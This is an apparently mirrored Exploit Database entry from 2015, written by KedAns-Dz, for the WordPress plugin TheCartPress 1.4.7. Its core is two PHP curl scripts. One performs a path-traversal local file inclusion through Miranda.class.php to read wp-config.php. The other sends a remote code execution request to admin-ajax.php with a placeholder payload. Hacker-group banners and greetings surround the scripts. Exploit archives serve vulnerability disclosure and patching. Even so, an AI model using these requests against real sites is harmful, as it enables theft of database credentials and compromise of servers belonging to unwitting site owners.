WordPress Plugin TheCartPress 1.4.7 – Multiple Vulnerabilities

• Exploit Database
• 138 阅读

• 作者： KedAns-Dz
  日期： 2015-12-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38869/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82

  ########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------*# #K|....##...##..####...####....|. # #h|....#...#........#..#...#...|A # #a|....#..#.........#..#....#..|N # #l|....###........##...#.....#.|S # #E|....#.#..........#..#....#..|e # #D|....#..#.........#..#...#...|u # #.|....##..##...####...####....|r # # *----------------------------*# #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >>D_x . Made In Algeria . x_Z<< # ########################################### # # [>] Title : WordPress Plugin TheCartPress v1.4.7 Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : Multiple # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://thecartpress.com # ########################################### # # [!] Description : # # WordPress plugin TheCartPress v1.4.7 is suffer from multiple vulnerabilities # remote attacker can disclosure some local files or do a remote code execution. # ####   // page : Miranda.class.php // lines : 111.. 115   /* --[1] Local File Include -- */ <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php%00"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?>   /* --[2] Remote Code Execution -- */ <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp/admin-ajax.php?action=tcp_miranda_save_admin_panel&class=[RCE]"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?>   #### #<! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> #Hassi Messaoud (30500) , 1850 city/hood si&apos; elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz, & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; ####